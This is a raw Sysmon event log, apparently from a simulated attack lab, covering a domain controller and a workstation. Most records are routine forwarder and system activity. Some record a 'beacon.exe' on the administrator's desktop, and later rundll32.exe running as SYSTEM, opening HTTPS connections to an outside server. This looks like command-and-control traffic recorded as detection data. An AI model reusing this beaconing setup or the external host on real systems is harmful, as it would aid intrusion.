13241300x800000000000000057344607Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:15:59.463{8B6011A9-886B-6164-0B00-00000000F101}648C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7d7bf-0x0d5ed2d3) 13241300x800000000000000057344606Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:15:59.463{8B6011A9-886B-6164-0B00-00000000F101}648C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7d7c7-0x6f233ad3) 13241300x800000000000000057344605Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:15:59.463{8B6011A9-886B-6164-0B00-00000000F101}648C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000057344604Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:15:59.463{8B6011A9-886B-6164-0B00-00000000F101}648C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0xa35fc4e3) 12241200x800000000000000057344603Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:15:59.463{8B6011A9-886B-6164-0B00-00000000F101}648C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime 13241300x800000000000000057344602Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:15:59.463{8B6011A9-886B-6164-0B00-00000000F101}648C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7d7b6-0xab9a6ad3) 13241300x800000000000000057344601Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:15:59.463{8B6011A9-886B-6164-0B00-00000000F101}648C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7d7bf-0x0d5ed2d3) 13241300x800000000000000057344600Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:15:59.463{8B6011A9-886B-6164-0B00-00000000F101}648C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7d7c7-0x6f233ad3) 23542300x800000000000000021219367Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:59.147{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CCF18EFA587E5DBA8DF9EA59093484AC,SHA256=83B45C7492FCEFB5A83399899582B6A8C09F729D830E3D85D4AC5FD853673D97,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219366Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:59.147{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2BE85B8C96C25534932D693BF33A643E,SHA256=3E7F91E6B93F6E39F2BCA34CA25ED4CA21AD4359A1AB2A645655E1230367D46B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219370Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:00.756{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B71B0937297ECE4F860B3FFDD3528166,SHA256=CBBF9DA134B1DF2F52D783701F17E1D50A376AF6FABF26435533675428532054,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057344616Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:00.678{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344615Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:00.678{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D89EFD10C83F27C6AB9F6D14B27AED79,SHA256=20C9C21C8DC9FEACC095718C3BB425305C76C79E7479664FE3EBE1EFDF49BBE3falsetrue 354300x800000000000000021219369Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:46.551{AD5E2759-54CF-6143-D400-00000000F101}3540C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-874.attackrange.local64308-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x800000000000000021219371Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:01.756{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=250F48375FB2DB594CC02266EB2D2073,SHA256=B71D1D3932770771B645F4BCEE6BCC35FE341C088D5D0178C1B045DBC44F6794,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057344618Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:01.693{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344617Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:01.693{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13061BDE099CD5407C904149DFE85DFA,SHA256=843B9F1A42CB0EE35DF3ED9DE12EEFB18FFD3EA7726C5AD2E91A3E30B229DED2falsetrue 11241100x800000000000000057344622Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:02.714{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344621Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:02.713{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E4471BFFA0BA196AB91C79B74C33852,SHA256=42E3ABBA7F48C5E755FD28D74E2800FD009E0F4781654209385B667B41509295falsetrue 23542300x800000000000000021219372Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:02.756{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C8D4A03DADD916CB6088887F6095BDE,SHA256=F1F6A1B59425F90BA65FD2742828B9AA37A877FFA8E8CD5F5A4D3E8329DB6D99,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 12241200x800000000000000057344620Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:16:02.545{8B6011A9-88DD-6164-B500-00000000F101}5592C:\Users\Administrator\Desktop\beacon.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057344619Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:16:02.545{8B6011A9-88DD-6164-B500-00000000F101}5592C:\Users\Administrator\Desktop\beacon.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 11241100x800000000000000057344628Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:03.729{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344627Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:03.729{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E9439BC5E870C0A2EF3B92775C155D0,SHA256=56F31C85A1F08F3AAB4092FD1A8A1599D72ABC694F7DA397CC7526CD3A62D23Dfalsetrue 23542300x800000000000000021219373Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:03.756{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF420C9C42A3A960689C4A2B4A31ADAC,SHA256=A2D769CD470D966F7F6B942715A9E746D436C68D6671A99B4BFD35BEC15474CF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057344626Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:03.591{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057344625Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:03.591{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F6AE78B80EAEF19DD92B91FE863B9543,SHA256=2069F81DA4F8C6FED3AC80F9EAA43B0C70294AE99251C1403AC08D76D216CE69falsetrue 11241100x800000000000000057344624Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:03.591{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057344623Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:03.591{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=02FC92F2FA6C1F067740DCBAAB6E1878,SHA256=98192B5707A3A075A738941316170233F63DC9A35AAA8BC90DF844FAE942F434falsetrue 354300x800000000000000057344632Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:35.481{8B6011A9-BB96-618B-7AA0-04000000F101}7856C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54525-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 354300x800000000000000057344631Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:34.898{8B6011A9-88DD-6164-B500-00000000F101}5592C:\Users\Administrator\Desktop\beacon.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-469.attackrange.local54524-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https 11241100x800000000000000057344630Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:04.759{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344629Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:04.759{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=678BD479F0C02F168F70E202596FDBAA,SHA256=0A017B0631A3EF6E8462424B89DAC1E6E088A8F3FE52CA8211176E3E89987F43falsetrue 23542300x800000000000000021219377Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:04.756{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BCC11F7EFE429990BC365358A1717A65,SHA256=29476B9A11E364D88837940AB98139F08D8BBAE82D94DE671E6AB282E0B7AC36,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000021219376Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:51.660{AD5E2759-54CF-6143-D400-00000000F101}3540C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-874.attackrange.local64309-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x800000000000000021219375Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:04.490{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FFD48E62B1C45F36AB0F7E942688BBED,SHA256=3D8638A3270750FC642DD9112F6A95C4B9F9573677672B7F2B0FA9934965B2EA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219374Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:04.490{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CCF18EFA587E5DBA8DF9EA59093484AC,SHA256=83B45C7492FCEFB5A83399899582B6A8C09F729D830E3D85D4AC5FD853673D97,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057344634Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:05.790{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344633Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:05.790{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E9BCBDBC8CDCE8D88B4F3DC02A85D80,SHA256=6E39519662147ED35B64EB53D407E52EE9F32D6E7731F31CE627C18F67936022falsetrue 23542300x800000000000000021219378Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:05.756{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD95AE71525D26CCF81185743EE17372,SHA256=801BD5C4D05E7E97C79A764780B7523319AF8FA25C8359D195A49469FC43AA3B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057344638Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:06.809{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344637Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:06.809{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E79455DF2735DE3210962BAE5002428,SHA256=1D200A6754287F78F636E14E62856E7287294027EFD1E7BC0D269CF76BC17BFFfalsetrue 23542300x800000000000000021219379Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:06.756{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5523DF56F4E1978193808C5E8D8E17B,SHA256=280382B11B574D7AE16926414522451F81D9416E2AFE6F0ABBAECD9972315D1B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 12241200x800000000000000057344636Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:16:06.110{8B6011A9-891D-6164-C500-00000000F101}2944C:\Windows\System32\rundll32.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057344635Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:16:06.106{8B6011A9-891D-6164-C500-00000000F101}2944C:\Windows\System32\rundll32.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 11241100x800000000000000057344695Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:07.926{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344694Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:07.926{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C9C294758D7A0F417269AD10139EBFE,SHA256=C12DE2B1D144486AC7F68F4699A54C355DEE2948F0E20FEE9D88497F0ECFFB18falsetrue 354300x800000000000000057344693Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:38.458{8B6011A9-891D-6164-C500-00000000F101}2944C:\Windows\System32\rundll32.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54526-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https 734700x800000000000000057344692Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:07.826{8B6011A9-5B07-618E-38F3-04000000F101}10164C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x800000000000000057344691Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:07.826{8B6011A9-5B07-618E-38F3-04000000F101}10164C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862trueMicrosoft WindowsValid 734700x800000000000000057344690Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:07.826{8B6011A9-5B07-618E-38F3-04000000F101}10164C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x800000000000000057344689Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:16:07.826{8B6011A9-5B07-618E-38F3-04000000F101}10164\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe 734700x800000000000000057344688Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:07.826{8B6011A9-5B07-618E-38F3-04000000F101}10164C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x800000000000000057344687Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:16:07.826{8B6011A9-5B07-618E-38F3-04000000F101}10164\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe 734700x800000000000000057344686Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:07.826{8B6011A9-5B07-618E-38F3-04000000F101}10164C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000057344685Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:07.826{8B6011A9-5B07-618E-38F3-04000000F101}10164C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x800000000000000057344684Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:07.826{8B6011A9-5B07-618E-38F3-04000000F101}10164C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x800000000000000057344683Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:07.826{8B6011A9-5B07-618E-38F3-04000000F101}10164C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x800000000000000057344682Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:07.826{8B6011A9-5B07-618E-38F3-04000000F101}10164C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 23542300x800000000000000021219381Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:07.758{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B38692B57F868F7B224C9F05D9A2ABC8,SHA256=C1BCA31AD134D6A6B221764654C69EF0F2B4BA7204D5BEABC0BF8D13B25CDC50,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x800000000000000057344681Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:07.811{8B6011A9-5B07-618E-38F3-04000000F101}10164C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x800000000000000057344680Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:07.811{8B6011A9-5B07-618E-38F3-04000000F101}10164C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft 